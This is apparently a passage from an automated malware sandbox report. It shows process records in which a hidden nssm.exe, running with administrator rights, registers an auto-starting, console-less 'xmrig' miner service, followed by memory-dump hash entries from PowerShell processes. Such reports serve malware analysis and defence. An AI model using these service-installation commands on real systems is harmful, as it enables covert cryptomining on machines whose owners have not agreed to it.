                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:06:21:30
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\.logstxt\nssm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\.logstxt\nssm.exe" set xmrig start SERVICE_AUTO_START
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:331'264 bytes
                                                                                                                                                                                                                                MD5 hash:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:06:21:30
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\.logstxt\nssm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\.logstxt\nssm.exe" set xmrig AppNoConsole 1
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:331'264 bytes
                                                                                                                                                                                                                                MD5 hash:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:06:21:31
                                                                                                                                                                                                                                Start date:06/12/2024
                                                                                                                                                                                                                                Path:C:\ProgramData\.logstxt\nssm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\ProgramData\.logstxt\nssm.exe" set xmrig Type SERVICE_WIN32_OWN_PROCESS
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:331'264 bytes
                                                                                                                                                                                                                                MD5 hash:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Reset < >
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1332203847.00007FFAACB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB70000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffaacb70000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                  • Instruction ID: c383940a86e367a03895aa4b15aadced69935053dae228fa83d66cf60d822ce0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA01447111CB088FD748EF0CE451AA6B7E0FB99364F10056DE58AC3691DB26E882CB45
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (P&$(P&$(P&$(P&$(P&
                                                                                                                                                                                                                                  • API String ID: 0-805297863
                                                                                                                                                                                                                                  • Opcode ID: 71c7f286dc330e42d47ed9aead3ae1a807ddd3f0e0f6b7a13fd459330681f43c
                                                                                                                                                                                                                                  • Instruction ID: b990e073520c20f54fd108922a14d0e05cc6742daa8fa6e62a0dbdab4b8b755b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71c7f286dc330e42d47ed9aead3ae1a807ddd3f0e0f6b7a13fd459330681f43c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41518771A1592A8FEF54EB58C455AB973E2FF55310B008275D05EC32A1DF2AE84AC7C0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $(P&$(P&$r6
                                                                                                                                                                                                                                  • API String ID: 0-1954074592
                                                                                                                                                                                                                                  • Opcode ID: a55ee6d939ee48b41ad1c05c14aeab47ae25554de00f157c47431d404b771a14
                                                                                                                                                                                                                                  • Instruction ID: 20ad364be08783f018d53bbe62d0e818ee6a38dfd5806ae6cfec15396d982128
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a55ee6d939ee48b41ad1c05c14aeab47ae25554de00f157c47431d404b771a14
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE914C3160DA694FE764EB2CD845AB57BD1EF96310F1442BBE04DC7262DE1ADC4A83C1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (P&$@Q_H
                                                                                                                                                                                                                                  • API String ID: 0-2255194106
                                                                                                                                                                                                                                  • Opcode ID: e5f60598fb2df18f9f240c55fb71b827fee2bfe90ac7f3aa9ffe3f3a360a5de3
                                                                                                                                                                                                                                  • Instruction ID: ba297f1e6ad3fadb0ed5191648d57c3d24cc78980633a522a8e789b7138863e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5f60598fb2df18f9f240c55fb71b827fee2bfe90ac7f3aa9ffe3f3a360a5de3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84318321A099198FEB94EB28C454B7577D2EF9A340F5885B9D04EC7292DE1FEC86C780
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (P&
                                                                                                                                                                                                                                  • API String ID: 0-2457619965
                                                                                                                                                                                                                                  • Opcode ID: 2432c211d5524c7e1b85a19b5245c6069b5db41213da4bc4123a6ddabcb69860
                                                                                                                                                                                                                                  • Instruction ID: c77d9a21c429e621bb124420b3af8b371b40384d586963bbdda061030e880d4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2432c211d5524c7e1b85a19b5245c6069b5db41213da4bc4123a6ddabcb69860
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA514761A0EA294FFB94A73C98562B57BD1DF57210F0841BBD44EC31A2DE1FD80A83C1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (P&
                                                                                                                                                                                                                                  • API String ID: 0-2457619965
                                                                                                                                                                                                                                  • Opcode ID: 63336818396bf289fec1516c278031dca883219495ef2d558166bfabfc669903
                                                                                                                                                                                                                                  • Instruction ID: 41657a65f0089142f99343f510e39cf8a1b55a870d51366e784a7a980f36e377
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63336818396bf289fec1516c278031dca883219495ef2d558166bfabfc669903
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A51E53160D9188FEB49EB28D855ABA77E1EF95300F0041F6D84ED7297DE29EC4687C1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ;)
                                                                                                                                                                                                                                  • API String ID: 0-2586960840
                                                                                                                                                                                                                                  • Opcode ID: 2162802ee4eebc5e27e853fca9231839e45839e7169583a6f39841fcf42db19c
                                                                                                                                                                                                                                  • Instruction ID: be1b3d87a7d056bbddda598e767c9d0e09ecb35bcd7422e08da9f90077b30dec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2162802ee4eebc5e27e853fca9231839e45839e7169583a6f39841fcf42db19c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2416320A1E92A8FFE94EB2CC454A7573E1EF56310F644579D44EC3296DF2FE8468780
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: >
                                                                                                                                                                                                                                  • API String ID: 0-3434628772
                                                                                                                                                                                                                                  • Opcode ID: 9ec3473a9073a9ba425b3473d6080e64b3e759c49a47f39aa72c401076f4d417
                                                                                                                                                                                                                                  • Instruction ID: 620e71414282abe64c4e25aea0d957b1015f48927d554e577ce9797617e13740
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec3473a9073a9ba425b3473d6080e64b3e759c49a47f39aa72c401076f4d417
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF01E121E1D9298FEBA5E73C84166B43BD1EF59310F0180F6E00DC3296EA1ADC4A83C1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @Q_H
                                                                                                                                                                                                                                  • API String ID: 0-2450148255
                                                                                                                                                                                                                                  • Opcode ID: 3919047b07385f622996f42959a368bca65097a6e8824b9ec5f262fbb0ecb25c
                                                                                                                                                                                                                                  • Instruction ID: 82b5603d9d32ca48e018597dd943927026b1cfc8d14fe430ee3f1961b04cbadc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3919047b07385f622996f42959a368bca65097a6e8824b9ec5f262fbb0ecb25c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76E02B01F1E82A45FEA8072DAC4037502C2DFCB190F589979D50FC2184DE0FDC4642C0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: >
                                                                                                                                                                                                                                  • API String ID: 0-3434628772
                                                                                                                                                                                                                                  • Opcode ID: a8079d1ba55489f7811e8991e38fdb829ff1ea9cd6ccc2957ae6fb0201a8ba0c
                                                                                                                                                                                                                                  • Instruction ID: 6a1acf0a9819ee2996c6e675d5a5e5b0a4e36b62480a87fcebc6d60872bb182f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8079d1ba55489f7811e8991e38fdb829ff1ea9cd6ccc2957ae6fb0201a8ba0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDE0866262E9688FD6A4E73C9854A913BD5EB5D74071144D7F04DC71A5D511CC0C83D1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7e3746ee144867c4765bbb425b8fe17056259f3b7f2a22a2a2b05145607349ba
                                                                                                                                                                                                                                  • Instruction ID: 435eb67baac037e448d5524276e8a4f285080a4643204829601e30852536d09f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e3746ee144867c4765bbb425b8fe17056259f3b7f2a22a2a2b05145607349ba
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31221A3460895DCFDB98EF1CC898AA977E1FF69305B0501A9E85ED72A1DB36EC41CB40
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2052859012.00007FFAACC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacc60000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 34074520f238e049632b8a1274b0170cc0e309f48398ca1460e655f4f4ff9b0a
                                                                                                                                                                                                                                  • Instruction ID: c501c3f6328260e69ca42370b5c3b294e8bdf3ff7203c2e50a2682547505c9f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34074520f238e049632b8a1274b0170cc0e309f48398ca1460e655f4f4ff9b0a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AD11561A0EACA8FF756AB6C88555B5BFE0EF56320B0841FED44DC71D3DA18E809C391
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ca44af1c274803daa7ac219c32ebbce9faf1914bc3fc5374532a6e7c4fd2d20e
                                                                                                                                                                                                                                  • Instruction ID: d92365513dbe272a96e7c4f9b7b4152759e7803c1f24f1117a034fa1eb638543
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca44af1c274803daa7ac219c32ebbce9faf1914bc3fc5374532a6e7c4fd2d20e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7651F665F1D91A8AFB94A778C4256BC62D2EF9A300F4584B9D05EC32C2DF2FEC064281
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                                  • Instruction ID: 4ef1a44ec8d7a25df23cdfb05d5c5afbc63ed6613d52fd1cd22baaff7aee0d6f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1941C63131581C8FDAE4EB1CE898E6977E1FF6831271505EAE44ECB275DA66DC81CB40
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 52ccaed3b85a001ec87f499932e358f627cbf4ed4159cc9b10715ae3e34dd94f
                                                                                                                                                                                                                                  • Instruction ID: 1199b15410cfbd80843c14044d9a90117d0a4f70d61c921d8d25c87b3df36719
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52ccaed3b85a001ec87f499932e358f627cbf4ed4159cc9b10715ae3e34dd94f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0419071A0992A8FFB94DB68D4953B977E1EB9A311F00417AD00DD32D1DF2FA84683D1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 82ee38d0a208a58bfb42c36791a0deb84f98b260ba877da9e38bdfc68462af75
                                                                                                                                                                                                                                  • Instruction ID: 343e6bf51a8c765765abfeb66ff6bac5a7495a827fc22adb0238ef88fdf3e60e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82ee38d0a208a58bfb42c36791a0deb84f98b260ba877da9e38bdfc68462af75
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB41D3306099598FDBA4EF2CD458A6977E0FF49311B0541EAE48EC7272DB29EC85CBC1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 02280007032018d8b5f3197e90419af35b92fb38ad547470b1d2e8334ff1f327
                                                                                                                                                                                                                                  • Instruction ID: c73889c7a1731626478f29491b5be35ff7dc5b2cf15c33546f982e5c34c477e0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02280007032018d8b5f3197e90419af35b92fb38ad547470b1d2e8334ff1f327
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8441F565F1DA1A8AFBD4A778C4516B862D2EF9A300F1580B9D44EC32D3DF2FEC058281
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7b8e9ff55a192eb21e85fd7d5764ad4df3b7e6fe03fd21c05d7407079031bf7c
                                                                                                                                                                                                                                  • Instruction ID: c26d14f1046877f0f1947e044aa36fedd505e739eba6bef3d2d59b4e73b15877
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b8e9ff55a192eb21e85fd7d5764ad4df3b7e6fe03fd21c05d7407079031bf7c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9141E475F1D91A8AFBD49768C4216B862D2EF9A300F1580B9D44EC32D2DF2FEC458281
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ed782fb95f7ea98f90827faaf98970ea775092887c7f074631b17fdd416a857b
                                                                                                                                                                                                                                  • Instruction ID: 3523fe0252308f4c42897a3f06f014ba492f98c4631cb6a1115d571ca1ceb1df
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed782fb95f7ea98f90827faaf98970ea775092887c7f074631b17fdd416a857b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6931807190952A8BFB94EB68D4467FE76D1EF8A311F008539E40DD3281CF2FA84987D1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0fdd4e62a39ab3e395b2b9085e537259bbcde444955b6617446253719a0d0a64
                                                                                                                                                                                                                                  • Instruction ID: 3abac176434aeea7dae8badfe08ec14542bf30e7d1017c523378dcd8b7fa55b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fdd4e62a39ab3e395b2b9085e537259bbcde444955b6617446253719a0d0a64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F319D3190965A8FFB95DB68D8512A97BE1EF9A311F04817AE40DD3292CF2F980983D1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fedc483c97e791db6670b3c23b4b03aa26a505ecb4abebe87d646cd2f24dc164
                                                                                                                                                                                                                                  • Instruction ID: ba4dab785d8940063e6f495c929b603c02d31b2a780fb72d2b3f20d80c10e35f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fedc483c97e791db6670b3c23b4b03aa26a505ecb4abebe87d646cd2f24dc164
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF21D130219E588FDB98EB2CC88496577E2FF5A31130545BDD08FC7A62CA2AFC45C740
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 92e6cd70a68dd3c06627b4f87e32107faf2ee140baa6598eda8dfde952b99bc8
                                                                                                                                                                                                                                  • Instruction ID: 58cf472dff790eb4dcc7ce1ee525e3bdde2dde5f12869bf8c546a31c8779bb63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92e6cd70a68dd3c06627b4f87e32107faf2ee140baa6598eda8dfde952b99bc8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0511603120E8A88FEB95EB2CD8589647BE0EF6A31270904E7D08CCB172DA16DC84C740
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d9ac7da4e5779484a4ce6b718185586550153a70cb1f970cf6503e2dace957fb
                                                                                                                                                                                                                                  • Instruction ID: 3a33b44acb153411f38b7cc0ec7564cfc5fe7c86a14cb1678865ce4e8f501779
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9ac7da4e5779484a4ce6b718185586550153a70cb1f970cf6503e2dace957fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6116091B29D198FF694AB7890266BDA2D2EF94210F81847DD04FC32C6DF6EE8074781
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2051962362.00007FFAACB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffaacb90000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 26cccb5474ba60cbb40bb8e1e10fe8fcfc414c49e3f02fb549053ffbdd9d2be2
                                                                                                                                                                                                                                  • Instruction ID: 68a5ed0a7ff0c7bee38e99cf9055e7d84e243e31184024157fa67969befcf574
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26cccb5474ba60cbb40bb8e1e10fe8fcfc414c49e3f02fb549053ffbdd9d2be2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36115C3194DA898FE711A724D8214E67FE5DB43314B0442AEE04EC7192DB5F994AC3D2
